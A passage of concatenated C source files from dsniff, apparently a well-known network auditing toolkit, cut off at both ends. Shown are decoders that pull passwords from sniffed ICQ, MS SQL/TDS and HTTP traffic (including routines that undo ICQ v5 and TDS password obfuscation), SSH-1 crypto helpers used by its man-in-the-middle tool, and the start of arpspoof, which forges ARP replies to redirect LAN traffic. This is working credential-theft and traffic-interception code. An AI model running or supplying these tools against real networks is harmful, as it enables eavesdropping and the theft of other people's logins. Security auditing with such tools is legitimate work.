(buf_get(&inbuf, &version, sizeof(version)) != sizeof(version)) 69 | return (0); 70 | 71 | version = pletohs(&version); 72 | 73 | switch (version) { 74 | case 2: 75 | if (buf_seek(&inbuf, ICQ2_CMD_OFFSET, SEEK_SET) < 0) 76 | return (0); 77 | 78 | if (buf_get(&inbuf, &cmd, sizeof(cmd)) != sizeof(cmd)) 79 | return (0); 80 | 81 | if ((cmd = pletohs(&cmd)) != 1000) 82 | return (0); 83 | 84 | if (buf_seek(&inbuf, ICQ2_UIN_OFFSET, SEEK_SET) < 0) 85 | return (0); 86 | 87 | if (buf_get(&inbuf, &uin, sizeof(uin)) != sizeof(uin)) 88 | return (0); 89 | 90 | uin = pletohl(&uin); 91 | 92 | if (buf_seek(&inbuf, ICQ2_PASS_OFFSET, SEEK_SET) < 0) 93 | return (0); 94 | break; 95 | 96 | case 5: 97 | { 98 | u_int32_t a1, a2, a3, a4, a5, c, key, i, k; 99 | 100 | if (buf_seek(&inbuf, ICQ5_CKSUM_OFFSET, SEEK_SET) < 0) 101 | return (0); 102 | 103 | if (buf_get(&inbuf, &c, sizeof(c)) != sizeof(c)) 104 | return (0); 105 | 106 | c = pletohl(&c); 107 | 108 | a1 = c & 0x0001f000; a1 = a1 >> 0x0c; 109 | a2 = c & 0x07c007c0; a2 = a2 >> 0x01; 110 | a3 = c & 0x003e0001; a3 = a3 << 0x0a; 111 | a4 = c & 0xf8000000; a4 = a4 >> 0x10; 112 | a5 = c & 0x0000083e; a5 = a5 << 0x0f; 113 | 114 | key = len * 0x68656C6C; 115 | key += a1 + a2 + a3 + a4 + a5; 116 | 117 | p = inbuf.base; 118 | 119 | for (i = 0x0a; i < inbuf.end + 3; i += 4) { 120 | k = key + icq5_table[i & 0xff]; 121 | if (i != 0x16) { 122 | p[i] ^= (u_char)(k & 0xff); 123 | p[i + 1] ^= (u_char)((k & 0xff00) >> 8); 124 | } 125 | if (i != 0x12) { 126 | p[i + 2] ^= (u_char)((k & 0xff0000) >> 16); 127 | p[i + 3] ^= (u_char)((k & 0xff000000) >> 24); 128 | } 129 | } 130 | if (buf_seek(&inbuf, ICQ5_CMD_OFFSET, SEEK_SET) < 0) 131 | return (0); 132 | 133 | if (buf_get(&inbuf, &cmd, sizeof(cmd)) != sizeof(cmd)) 134 | return (0); 135 | 136 | if ((cmd = pletohs(&cmd)) != 1000) 137 | return (0); 138 | 139 | if (buf_seek(&inbuf, ICQ5_UIN_OFFSET, SEEK_SET) < 0) 140 | return (0); 141 | 142 | if (buf_get(&inbuf, &uin, sizeof(uin)) != sizeof(uin)) 143 | return (0); 144 | 145 | uin = pletohl(&uin); 146 | 147 | if (buf_seek(&inbuf, ICQ5_PASS_OFFSET, SEEK_SET) < 0) 148 | return (0); 149 | } 150 | break; 151 | 152 | default: 153 | return (0); 154 | } 155 | buf_putf(&outbuf, "%d\n%.*s\n", uin, buf_len(&inbuf), buf_ptr(&inbuf)); 156 | 157 | buf_end(&outbuf); 158 | 159 | return (buf_len(&outbuf)); 160 | } 161 | 162 | -------------------------------------------------------------------------------- /decode_tds.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_tds.c 3 | * 4 | * Tabular Data Stream (Sybase, Microsoft SQL). See www.freetds.org. 5 | * 6 | * Thanks to antilove!@#$% and Ben Lowery for 7 | * providing me with packet traces. 8 | * 9 | * Copyright (c) 2000 Dug Song 10 | * Copyright (c) 2001 Paul van Maaren 11 | * 12 | * $Id: decode_tds.c,v 1.10 2001/03/15 08:33:02 dugsong Exp $ 13 | */ 14 | 15 | #include "config.h" 16 | 17 | #include 18 | 19 | #include 20 | #include 21 | 22 | #include "decode.h" 23 | 24 | struct tds_hdr { 25 | u_char type; 26 | u_char last; 27 | u_short size; 28 | u_int32_t zero; 29 | }; 30 | 31 | struct tds_login { 32 | char hostname[30]; 33 | u_char hostlen; 34 | char username[30]; 35 | u_char userlen; 36 | char password[30]; 37 | u_char passlen; 38 | char process[30]; 39 | u_char proclen; 40 | char magic1[6]; 41 | u_char bulkcopy; 42 | char magic2[9]; 43 | char appname[30]; 44 | u_char applen; 45 | char servername[30]; 46 | u_char serverlen; 47 | u_char zero; 48 | u_char pass2len; 49 | char password2[30]; 50 | char magic3[223]; 51 | u_char pass2len2; 52 | char version[4]; 53 | char libname[10]; 54 | u_char liblen; 55 | char magic4[3]; 56 | char language[30]; 57 | u_char langlen; 58 | u_char nolang; 59 | u_short magic5; 60 | u_char encrypted; 61 | char magic6[10]; 62 | char charset[30]; 63 | u_char charlen; 64 | u_char magic7; 65 | char blocksize[6]; 66 | u_char blocklen; 67 | char magic8[4]; /* 4.2: 8, 4.6: 4, 5.0: 25 */ 68 | }; 69 | 70 | u_char tds7_magic1[] = { 71 | 0x6, 0x83, 0xf2, 0xf8, 0xff, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x03, 0x0, 72 | 0x0, 0x88, 0xff, 0xff, 0xff, 0x36, 0x04, 0x00, 0x00 73 | }; 74 | 75 | struct tds7_login { 76 | u_short size; 77 | char zero1[5]; 78 | u_char byte1; /* 0x70 */ 79 | char zero2[7]; 80 | char magic1[21]; 81 | u_short servpos; 82 | u_short servlen; 83 | u_short userpos; /* XXX - freetds got this wrong? */ 84 | u_short userlen; 85 | u_short passpos; 86 | u_short passlen; 87 | u_short somepos; 88 | u_short somelen; 89 | u_short apppos; 90 | u_short applen; 91 | char zero4[4]; 92 | u_short libpos; 93 | u_short liblen; 94 | char skip1[8]; 95 | char magic2[6]; 96 | char skip2[8]; 97 | /* char servername[servlen]; */ 98 | /* char username[userlen]; */ 99 | /* char password[passlen]; */ 100 | /* char appname[applen]; */ 101 | /* char server[servlen]; */ 102 | /* char library[liblen]; */ 103 | /* char magic3[48]; */ 104 | }; 105 | 106 | static void 107 | deunicode(u_char *buf, int len) 108 | { 109 | int i; 110 | 111 | for (i = 0; i < len; i++) { 112 | buf[i] = buf[i * 2]; 113 | } 114 | buf[i] = '\0'; 115 | } 116 | 117 | 118 | static void 119 | tds7_decrypt(u_char *buf, int len) 120 | { 121 | int i; 122 | 123 | for (i = 0; i < len; i++) { 124 | buf[i] = ((buf[i] << 4) | (buf[i] >> 4)) ^ 0x5a; 125 | } 126 | buf[i] = '\0'; 127 | } 128 | 129 | 130 | int 131 | decode_tds(u_char *buf, int len, u_char *obuf, int olen) 132 | { 133 | struct tds_hdr *th; 134 | struct tds_login *tl; 135 | struct tds7_login *t7l, *myt7l; 136 | u_char *user, *pass, *serv; 137 | u_short userlen, passlen, servlen; 138 | 139 | obuf[0] = '\0'; 140 | 141 | for (th = (struct tds_hdr *)buf; 142 | len > sizeof(*th) && len >= ntohs(th->size); 143 | buf += ntohs(th->size), len -= ntohs(th->size)) { 144 | 145 | if (th->type == 2) { 146 | /* Version 4.x, 5.0 */ 147 | if (len < sizeof(*th) + sizeof(*tl)) 148 | return (0); 149 | 150 | tl = (struct tds_login *)(th + 1); 151 | 152 | if (tl->userlen > sizeof(tl->username)) 153 | return (0); 154 | 155 | tl->username[tl->userlen] = '\0'; 156 | strlcat(obuf, tl->username, olen); 157 | strlcat(obuf, "\n", olen); 158 | 159 | if (tl->passlen > sizeof(tl->password)) 160 | return (0); 161 | 162 | tl->password[tl->passlen] = '\0'; 163 | strlcat(obuf, tl->password, olen); 164 | strlcat(obuf, "\n", olen); 165 | } 166 | else if (th->type == 16 && th->last == 1) { 167 | /* Version 7.0 */ 168 | if (len < sizeof(*th) + sizeof(*t7l)) 169 | return (0); 170 | 171 | t7l = (struct tds7_login *)(th + 1); 172 | 173 | myt7l = (struct tds7_login *)(buf + sizeof(*th)); 174 | 175 | userlen = pletohs(&t7l->userlen); 176 | passlen = pletohs(&t7l->passlen); 177 | servlen = pletohs(&t7l->servlen); 178 | 179 | if (len < sizeof(*th) + sizeof(*t7l) + 180 | (2 * (userlen + passlen))) { 181 | return (0); 182 | } 183 | 184 | serv = (u_char *)(t7l + 1); 185 | deunicode(serv, servlen); 186 | 187 | user = serv + (2 * servlen); 188 | pass = user + (2 * userlen); 189 | 190 | deunicode(user, userlen); 191 | 192 | /* XXX - when to call? */ 193 | tds7_decrypt(pass, 2 * passlen); 194 | 195 | deunicode(pass, passlen); 196 | 197 | snprintf(obuf + strlen(obuf), 198 | olen - strlen(obuf), 199 | "%s\n%s\n", user, pass); 200 | return(strlen(obuf)); 201 | } 202 | } 203 | return (strlen(obuf)); 204 | } 205 | 206 | 207 | -------------------------------------------------------------------------------- /sshcrypto.c: -------------------------------------------------------------------------------- 1 | /* 2 | * sshcrypto.c 3 | * 4 | * SSH-1 crypto routines, adapted from OpenSSH. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * Copyright (c) 2000 Niels Provos 8 | * Copyright (c) 2000 Markus Friedl 9 | * 10 | * $Id: sshcrypto.c,v 1.5 2001/03/15 08:33:04 dugsong Exp $ 11 | */ 12 | 13 | #include "config.h" 14 | 15 | #include 16 | #include 17 | 18 | #include 19 | #include 20 | #include 21 | 22 | #include "sshcrypto.h" 23 | 24 | struct blowfish_state { 25 | struct bf_key_st key; 26 | u_char iv[8]; 27 | }; 28 | 29 | struct des3_state { 30 | des_key_schedule k1, k2, k3; 31 | des_cblock iv1, iv2, iv3; 32 | }; 33 | 34 | void 35 | rsa_public_encrypt(BIGNUM *out, BIGNUM *in, RSA *key) 36 | { 37 | u_char *inbuf, *outbuf; 38 | int len, ilen, olen; 39 | 40 | if (BN_num_bits(key->e) < 2 || !BN_is_odd(key->e)) 41 | errx(1, "rsa_public_encrypt() exponent too small or not odd"); 42 | 43 | olen = BN_num_bytes(key->n); 44 | outbuf = malloc(olen); 45 | 46 | ilen = BN_num_bytes(in); 47 | inbuf = malloc(ilen); 48 | 49 | if (outbuf == NULL || inbuf == NULL) 50 | err(1, "malloc"); 51 | 52 | BN_bn2bin(in, inbuf); 53 | 54 | if ((len = RSA_public_encrypt(ilen, inbuf, outbuf, key, 55 | RSA_PKCS1_PADDING)) <= 0) 56 | errx(1, "rsa_public_encrypt() failed"); 57 | 58 | BN_bin2bn(outbuf, len, out); 59 | 60 | memset(outbuf, 0, olen); 61 | memset(inbuf, 0, ilen); 62 | free(outbuf); 63 | free(inbuf); 64 | } 65 | 66 | void 67 | rsa_private_decrypt(BIGNUM *out, BIGNUM *in, RSA *key) 68 | { 69 | u_char *inbuf, *outbuf; 70 | int len, ilen, olen; 71 | 72 | olen = BN_num_bytes(key->n); 73 | outbuf = malloc(olen); 74 | 75 | ilen = BN_num_bytes(in); 76 | inbuf = malloc(ilen); 77 | 78 | if (outbuf == NULL || inbuf == NULL) 79 | err(1, "malloc"); 80 | 81 | BN_bn2bin(in, inbuf); 82 | 83 | if ((len = RSA_private_decrypt(ilen, inbuf, outbuf, key, 84 | RSA_PKCS1_PADDING)) <= 0) 85 | errx(1, "rsa_private_decrypt() failed"); 86 | 87 | BN_bin2bn(outbuf, len, out); 88 | 89 | memset(outbuf, 0, olen); 90 | memset(inbuf, 0, ilen); 91 | free(outbuf); 92 | free(inbuf); 93 | } 94 | 95 | /* XXX - SSH1's weirdo Blowfish... */ 96 | static void 97 | swap_bytes(const u_char *src, u_char *dst, int n) 98 | { 99 | char c[4]; 100 | 101 | for (n = n / 4; n > 0; n--) { 102 | c[3] = *src++; c[2] = *src++; 103 | c[1] = *src++; c[0] = *src++; 104 | *dst++ = c[0]; *dst++ = c[1]; 105 | *dst++ = c[2]; *dst++ = c[3]; 106 | } 107 | } 108 | 109 | void * 110 | blowfish_init(u_char *sesskey, int len) 111 | { 112 | struct blowfish_state *state; 113 | 114 | if ((state = malloc(sizeof(*state))) == NULL) 115 | err(1, "malloc"); 116 | 117 | BF_set_key(&state->key, len, sesskey); 118 | memset(state->iv, 0, 8); 119 | 120 | return (state); 121 | } 122 | 123 | void 124 | blowfish_encrypt(u_char *src, u_char *dst, int len, void *state) 125 | { 126 | struct blowfish_state *estate; 127 | 128 | estate = (struct blowfish_state *)state; 129 | swap_bytes(src, dst, len); 130 | BF_cbc_encrypt((void *)dst, dst, len, &estate->key, estate->iv, 131 | BF_ENCRYPT); 132 | swap_bytes(dst, dst, len); 133 | } 134 | 135 | void 136 | blowfish_decrypt(u_char *src, u_char *dst, int len, void *state) 137 | { 138 | struct blowfish_state *dstate; 139 | 140 | dstate = (struct blowfish_state *)state; 141 | swap_bytes(src, dst, len); 142 | BF_cbc_encrypt((void *)dst, dst, len, &dstate->key, dstate->iv, 143 | BF_DECRYPT); 144 | swap_bytes(dst, dst, len); 145 | } 146 | 147 | /* XXX - SSH1's weirdo 3DES... */ 148 | void * 149 | des3_init(u_char *sesskey, int len) 150 | { 151 | struct des3_state *state; 152 | 153 | if ((state = malloc(sizeof(*state))) == NULL) 154 | err(1, "malloc"); 155 | 156 | des_set_key((void *)sesskey, state->k1); 157 | des_set_key((void *)(sesskey + 8), state->k2); 158 | 159 | if (len <= 16) 160 | des_set_key((void *)sesskey, state->k3); 161 | else 162 | des_set_key((void *)(sesskey + 16), state->k3); 163 | 164 | memset(state->iv1, 0, 8); 165 | memset(state->iv2, 0, 8); 166 | memset(state->iv3, 0, 8); 167 | 168 | return (state); 169 | } 170 | void 171 | des3_encrypt(u_char *src, u_char *dst, int len, void *state) 172 | { 173 | struct des3_state *estate; 174 | 175 | estate = (struct des3_state *)state; 176 | memcpy(estate->iv1, estate->iv2, 8); 177 | 178 | des_ncbc_encrypt(src, dst, len, estate->k1, &estate->iv1, DES_ENCRYPT); 179 | des_ncbc_encrypt(dst, dst, len, estate->k2, &estate->iv2, DES_DECRYPT); 180 | des_ncbc_encrypt(dst, dst, len, estate->k3, &estate->iv3, DES_ENCRYPT); 181 | } 182 | 183 | void 184 | des3_decrypt(u_char *src, u_char *dst, int len, void *state) 185 | { 186 | struct des3_state *dstate; 187 | 188 | dstate = (struct des3_state *)state; 189 | memcpy(dstate->iv1, dstate->iv2, 8); 190 | 191 | des_ncbc_encrypt(src, dst, len, dstate->k3, &dstate->iv3, DES_DECRYPT); 192 | des_ncbc_encrypt(dst, dst, len, dstate->k2, &dstate->iv2, DES_ENCRYPT); 193 | des_ncbc_encrypt(dst, dst, len, dstate->k1, &dstate->iv1, DES_DECRYPT); 194 | } 195 | -------------------------------------------------------------------------------- /CVS/Entries: -------------------------------------------------------------------------------- 1 | D/missing//// 2 | /filesnarf.8/1.5/Sun Nov 19 06:23:33 2000// 3 | /mailsnarf.8/1.6/Sun Nov 19 06:09:28 2000// 4 | /msgsnarf.8/1.4/Sun Nov 19 06:10:50 2000// 5 | /urlsnarf.8/1.3/Sun Nov 19 06:24:51 2000// 6 | /dnsspoof.hosts/1.2/Sun Nov 19 21:37:34 2000// 7 | /arpspoof.8/1.1/Tue Nov 28 07:43:43 2000// 8 | /acconfig.h/1.4/Tue Nov 28 14:47:48 2000// 9 | /config.h.in/1.14/Tue Nov 28 18:20:14 2000// 10 | /TODO/1.2/Sat Dec 2 06:29:30 2000// 11 | /sshmitm.8/1.5/Fri Dec 15 04:46:34 2000// 12 | /dsniff.services/1.8/Fri Dec 15 20:10:58 2000// 13 | /dsniff.8/1.35/Fri Dec 15 16:05:36 2000// 14 | /mount.x/1.1/Sat Dec 9 09:12:21 2000// 15 | /LICENSE/1.2/Tue Nov 14 15:50:55 2000// 16 | /dnsspoof.8/1.4/Tue Nov 14 15:51:07 2000// 17 | /dsniff.magic/1.8/Tue Nov 14 15:51:06 2000// 18 | /install-sh/1.1/Tue Nov 14 15:50:58 2000// 19 | /macof.8/1.2/Tue Nov 14 15:50:58 2000// 20 | /nfs_prot.x/1.2/Tue Nov 14 15:51:06 2000// 21 | /remote.c/1.3/Tue Nov 14 15:51:04 2000// 22 | /vroot.h/1.1/Tue Nov 14 15:51:04 2000// 23 | /webspy.8/1.1/Tue Nov 14 15:51:05 2000// 24 | /configure.in/1.27/Wed Dec 20 16:31:21 2000// 25 | /configure/1.27/Wed Dec 20 16:30:34 2000// 26 | /arp.h/1.1/Thu Mar 15 08:27:08 2001// 27 | /arp.c/1.8/Thu Mar 15 08:32:58 2001// 28 | /arpspoof.c/1.5/Thu Mar 15 08:32:58 2001// 29 | /asn1.c/1.4/Thu Mar 15 08:32:58 2001// 30 | /base64.c/1.4/Thu Mar 15 08:32:59 2001// 31 | /buf.c/1.7/Thu Mar 15 08:32:59 2001// 32 | /decode.c/1.13/Thu Mar 15 08:32:59 2001// 33 | /decode_aim.c/1.5/Thu Mar 15 08:32:59 2001// 34 | /decode_citrix.c/1.5/Thu Mar 15 08:32:59 2001// 35 | /decode_cvs.c/1.6/Thu Mar 15 08:32:59 2001// 36 | /decode_ftp.c/1.7/Thu Mar 15 08:32:59 2001// 37 | /decode_hex.c/1.5/Thu Mar 15 08:32:59 2001// 38 | /decode_http.c/1.17/Thu Mar 15 08:32:59 2001// 39 | /decode_icq.c/1.7/Thu Mar 15 08:33:00 2001// 40 | /decode_imap.c/1.5/Thu Mar 15 08:33:00 2001// 41 | /decode_irc.c/1.6/Thu Mar 15 08:33:01 2001// 42 | /decode_ldap.c/1.5/Thu Mar 15 08:33:01 2001// 43 | /decode_mmxp.c/1.8/Thu Mar 15 08:33:01 2001// 44 | /decode_mountd.c/1.7/Thu Mar 15 08:33:01 2001// 45 | /decode_napster.c/1.6/Thu Mar 15 08:33:01 2001// 46 | /decode_nntp.c/1.5/Thu Mar 15 08:33:01 2001// 47 | /decode_oracle.c/1.6/Thu Mar 15 08:33:01 2001// 48 | /decode_ospf.c/1.6/Thu Mar 15 08:33:01 2001// 49 | /decode_pcanywhere.c/1.7/Thu Mar 15 08:33:01 2001// 50 | /decode_pop.c/1.4/Thu Mar 15 08:33:02 2001// 51 | /decode_portmap.c/1.8/Thu Mar 15 08:33:02 2001// 52 | /decode_postgresql.c/1.6/Thu Mar 15 08:33:02 2001// 53 | /decode_pptp.c/1.4/Thu Mar 15 08:33:02 2001// 54 | /decode_rip.c/1.4/Thu Mar 15 08:33:02 2001// 55 | /decode_rlogin.c/1.6/Thu Mar 15 08:33:02 2001// 56 | /decode_smb.c/1.4/Thu Mar 15 08:33:02 2001// 57 | /decode_smtp.c/1.3/Thu Mar 15 08:33:02 2001// 58 | /decode_sniffer.c/1.4/Thu Mar 15 08:33:02 2001// 59 | /decode_snmp.c/1.6/Thu Mar 15 08:33:02 2001// 60 | /decode_socks.c/1.4/Thu Mar 15 08:33:02 2001// 61 | /decode_tds.c/1.10/Thu Mar 15 08:33:02 2001// 62 | /decode_telnet.c/1.5/Thu Mar 15 08:33:03 2001// 63 | /decode_vrrp.c/1.5/Thu Mar 15 08:33:03 2001// 64 | /decode_x11.c/1.4/Thu Mar 15 08:33:03 2001// 65 | /decode_yp.c/1.6/Thu Mar 15 08:33:03 2001// 66 | /dnsspoof.c/1.10/Thu Mar 15 08:33:03 2001// 67 | /dsniff.c/1.69/Thu Mar 15 08:33:03 2001// 68 | /filesnarf.c/1.13/Thu Mar 15 08:33:03 2001// 69 | /hex.c/1.5/Thu Mar 15 08:33:03 2001// 70 | /macof.c/1.15/Thu Mar 15 08:33:04 2001// 71 | /magic.c/1.9/Thu Mar 15 08:33:04 2001// 72 | /mailsnarf.c/1.38/Thu Mar 15 08:33:04 2001// 73 | /msgsnarf.c/1.11/Thu Mar 15 08:33:04 2001// 74 | /pcaputil.c/1.2/Thu Mar 15 08:33:04 2001// 75 | /record.c/1.10/Thu Mar 15 08:33:04 2001// 76 | /rpc.c/1.8/Thu Mar 15 08:33:04 2001// 77 | /ssh.c/1.6/Thu Mar 15 08:33:04 2001// 78 | /sshcrypto.c/1.5/Thu Mar 15 08:33:04 2001// 79 | /sshmitm.c/1.7/Thu Mar 15 08:33:04 2001// 80 | /tcp_raw.c/1.10/Thu Mar 15 08:33:04 2001// 81 | /trigger.c/1.21/Thu Mar 15 08:33:05 2001// 82 | /webspy.c/1.28/Thu Mar 15 08:33:05 2001// 83 | /asn1.h/1.3/Thu Mar 15 08:33:05 2001// 84 | /base64.h/1.2/Thu Mar 15 08:33:05 2001// 85 | /buf.h/1.6/Thu Mar 15 08:33:05 2001// 86 | /decode.h/1.5/Thu Mar 15 08:33:06 2001// 87 | /hex.h/1.3/Thu Mar 15 08:33:06 2001// 88 | /magic.h/1.3/Thu Mar 15 08:33:06 2001// 89 | /options.h/1.4/Thu Mar 15 08:33:06 2001// 90 | /pathnames.h/1.2/Thu Mar 15 08:33:06 2001// 91 | /pcaputil.h/1.2/Thu Mar 15 08:33:06 2001// 92 | /record.h/1.3/Thu Mar 15 08:33:06 2001// 93 | /rpc.h/1.4/Thu Mar 15 08:33:06 2001// 94 | /ssh.h/1.3/Thu Mar 15 08:33:06 2001// 95 | /sshcrypto.h/1.3/Thu Mar 15 08:33:06 2001// 96 | /tcp_raw.h/1.5/Thu Mar 15 08:33:06 2001// 97 | /trigger.h/1.5/Thu Mar 15 08:33:06 2001// 98 | /Makefile.in/1.42/Thu Mar 15 08:34:42 2001// 99 | /urlsnarf.c/1.35/Thu Mar 15 09:26:13 2001// 100 | /sshow.8/1.3/Sat Mar 17 05:37:47 2001// 101 | /README/1.47/Sat Mar 17 05:34:02 2001// 102 | /tcpnice.c/1.17/Sat Mar 17 07:41:51 2001// 103 | /tcpnice.8/1.5/Sat Mar 17 07:40:24 2001// 104 | /tcpkill.c/1.17/Sat Mar 17 08:10:43 2001// 105 | /tcpkill.8/1.4/Sat Mar 17 05:57:32 2001// 106 | /webmitm.c/1.11/Sat Mar 17 08:35:05 2001// 107 | /webmitm.8/1.5/Sat Mar 17 08:33:22 2001// 108 | /sshow.c/1.2/Mon Mar 19 06:52:15 2001// 109 | /CHANGES/1.56/Mon Mar 19 06:53:47 2001// 110 | /version.h/1.13/Mon Mar 19 06:53:21 2001// 111 | -------------------------------------------------------------------------------- /decode_http.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_http.c 3 | * 4 | * Hypertext Transfer Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_http.c,v 1.17 2001/03/15 08:32:59 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #include "base64.h" 23 | #include "buf.h" 24 | #include "decode.h" 25 | 26 | #define USER_REGEX ".*account.*|.*acct.*|.*domain.*|.*login.*|" \ 27 | ".*member.*|.*user.*|.*name|.*email|.*_id|" \ 28 | "id|uid|mn|mailaddress" 29 | 30 | #define PASS_REGEX ".*pass.*|.*pw|pw.*|additional_info" 31 | 32 | #define REGEX_FLAGS (REG_EXTENDED | REG_ICASE | REG_NOSUB) 33 | 34 | static regex_t *user_regex, *pass_regex; 35 | 36 | static int 37 | grep_query_auth(char *buf) 38 | { 39 | char *p, *q, *tmp; 40 | int user, pass; 41 | 42 | user = pass = 0; 43 | 44 | if ((tmp = strdup(buf)) == NULL) 45 | return (0); 46 | 47 | for (p = strtok(tmp, "&"); p != NULL; p = strtok(NULL, "&")) { 48 | if ((q = strchr(p, '=')) == NULL) 49 | continue; 50 | *q = '\0'; 51 | 52 | if (!user) { 53 | if (regexec(user_regex, p, 0, NULL, 0) == 0) { 54 | user = 1; 55 | continue; 56 | } 57 | } 58 | if (!pass) { 59 | if (regexec(pass_regex, p, 0, NULL, 0) == 0) 60 | pass = 1; 61 | } 62 | if (user && pass) break; 63 | } 64 | free(tmp); 65 | 66 | return (user && pass); 67 | } 68 | 69 | static char * 70 | http_req_dirname(char *req) 71 | { 72 | char *uri, *vers; 73 | 74 | if ((uri = strchr(req, ' ')) == NULL) 75 | return (req); 76 | 77 | if ((vers = strrchr(uri, ' ')) == uri) { 78 | vers = NULL; 79 | } 80 | else if (vers[-1] == '/') { 81 | return (req); 82 | } 83 | else *vers++ = '\0'; 84 | 85 | strcpy(req, dirname(req)); 86 | strcat(req, "/"); 87 | 88 | if (vers) { 89 | strcat(req, " "); 90 | strcat(req, vers); 91 | } 92 | return (req); 93 | } 94 | 95 | int 96 | decode_http(u_char *buf, int len, u_char *obuf, int olen) 97 | { 98 | struct buf *msg, inbuf, outbuf; 99 | char *p, *req, *auth, *pauth, *query, *host; 100 | int i; 101 | 102 | buf_init(&inbuf, buf, len); 103 | buf_init(&outbuf, obuf, olen); 104 | 105 | if (user_regex == NULL || pass_regex == NULL) { 106 | if ((user_regex = malloc(sizeof(*user_regex))) == NULL || 107 | (pass_regex = malloc(sizeof(*pass_regex))) == NULL) 108 | err(1, "malloc"); 109 | 110 | if (regcomp(user_regex, USER_REGEX, REGEX_FLAGS) || 111 | regcomp(pass_regex, PASS_REGEX, REGEX_FLAGS)) 112 | errx(1, "regcomp failed"); 113 | } 114 | while ((i = buf_index(&inbuf, "\r\n\r\n", 4)) >= 0) { 115 | msg = buf_tok(&inbuf, NULL, i); 116 | msg->base[msg->end] = '\0'; 117 | buf_skip(&inbuf, 4); 118 | 119 | if ((req = strtok(buf_ptr(msg), "\r\n")) == NULL) 120 | continue; 121 | 122 | if (strncmp(req, "GET ", 4) != 0 && 123 | strncmp(req, "POST ", 5) != 0 && 124 | strncmp(req, "CONNECT ", 8) != 0) 125 | continue; 126 | 127 | auth = pauth = query = host = NULL; 128 | 129 | if ((query = strchr(req, '?')) != NULL) 130 | query++; 131 | 132 | while ((p = strtok(NULL, "\r\n")) != NULL) { 133 | if (strncasecmp(p, "Authorization: Basic ", 21) == 0) { 134 | auth = p; 135 | } 136 | else if (strncasecmp(p, "Proxy-authorization: " 137 | "Basic ", 27) == 0) { 138 | pauth = p; 139 | } 140 | else if (strncasecmp(p, "Host: ", 6) == 0) { 141 | host = p; 142 | } 143 | else if (req[0] == 'P') { 144 | if (strncmp(p, "Content-type: ", 14) == 0) { 145 | if (strncmp(p + 14, "application/" 146 | "x-www-form-urlencoded", 147 | 33) != 0) { 148 | query = NULL; 149 | } 150 | } 151 | else if (strncmp(p, "Content-length: ", 16) == 0) { 152 | p += 16; 153 | i = atoi(p); 154 | if ((msg = buf_tok(&inbuf, NULL, i)) == NULL) 155 | continue; 156 | msg->base[msg->end] = '\0'; 157 | query = buf_ptr(msg); 158 | } 159 | } 160 | } 161 | if (auth || pauth || (query && grep_query_auth(query))) { 162 | if (buf_tell(&outbuf) > 0) 163 | buf_putf(&outbuf, "\n"); 164 | 165 | if (req[0] == 'G' && auth) 166 | req = http_req_dirname(req); 167 | 168 | buf_putf(&outbuf, "%s\n", req); 169 | 170 | if (host) 171 | buf_putf(&outbuf, "%s\n", host); 172 | 173 | if (pauth) { 174 | buf_putf(&outbuf, "%s", pauth); 175 | p = pauth + 27; 176 | i = base64_pton(p, p, strlen(p)); 177 | p[i] = '\0'; 178 | buf_putf(&outbuf, " [%s]\n", p); 179 | } 180 | if (auth) { 181 | buf_putf(&outbuf, "%s", auth); 182 | p = auth + 21; 183 | i = base64_pton(p, p, strlen(p)); 184 | p[i] = '\0'; 185 | buf_putf(&outbuf, " [%s]\n", p); 186 | } 187 | else if (req[0] == 'P' && query) { 188 | buf_putf(&outbuf, 189 | "Content-type: application/" 190 | "x-www-form-urlencoded\n" 191 | "Content-length: %d\n%s\n", 192 | strlen(query), query); 193 | } 194 | } 195 | } 196 | buf_end(&outbuf); 197 | 198 | return (buf_len(&outbuf)); 199 | } 200 | -------------------------------------------------------------------------------- /arpspoof.c: -------------------------------------------------------------------------------- 1 | /* 2 | * arpspoof.c 3 | * 4 | * Redirect packets from a target host (or from all hosts) intended for 5 | * another host on the LAN to ourselves. 6 | * 7 | * Copyright (c) 1999 Dug Song 8 | * 9 | * $Id: arpspoof.c,v 1.5 2001/03/15 08:32:58 dugsong Exp $ 10 | */ 11 | 12 | #include "config.h" 13 | 14 | #include 15 | #include 16 | #include 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | 25 | #include "arp.h" 26 | #include "version.h" 27 | 28 | extern char *ether_ntoa(struct ether_addr *); 29 | 30 | static struct libnet_link_int *llif; 31 | static struct ether_addr spoof_mac, target_mac; 32 | static in_addr_t spoof_ip, target_ip; 33 | static char *intf; 34 | 35 | static void 36 | usage(void) 37 | { 38 | fprintf(stderr, "Version: " VERSION "\n" 39 | "Usage: arpspoof [-i interface] [-t target] host\n"); 40 | exit(1); 41 | } 42 | 43 | static int 44 | arp_send(struct libnet_link_int *llif, char *dev, 45 | int op, u_char *sha, in_addr_t spa, u_char *tha, in_addr_t tpa) 46 | { 47 | char ebuf[128]; 48 | u_char pkt[60]; 49 | 50 | if (sha == NULL && 51 | (sha = (u_char *)libnet_get_hwaddr(llif, dev, ebuf)) == NULL) { 52 | return (-1); 53 | } 54 | if (spa == 0) { 55 | if ((spa = libnet_get_ipaddr(llif, dev, ebuf)) == 0) 56 | return (-1); 57 | spa = htonl(spa); /* XXX */ 58 | } 59 | if (tha == NULL) 60 | tha = "\xff\xff\xff\xff\xff\xff"; 61 | 62 | libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, pkt); 63 | 64 | libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4, 65 | op, sha, (u_char *)&spa, tha, (u_char *)&tpa, 66 | NULL, 0, pkt + ETH_H); 67 | 68 | fprintf(stderr, "%s ", 69 | ether_ntoa((struct ether_addr *)sha)); 70 | 71 | if (op == ARPOP_REQUEST) { 72 | fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n", 73 | ether_ntoa((struct ether_addr *)tha), 74 | libnet_host_lookup(tpa, 0), 75 | libnet_host_lookup(spa, 0)); 76 | } 77 | else { 78 | fprintf(stderr, "%s 0806 42: arp reply %s is-at ", 79 | ether_ntoa((struct ether_addr *)tha), 80 | libnet_host_lookup(spa, 0)); 81 | fprintf(stderr, "%s\n", 82 | ether_ntoa((struct ether_addr 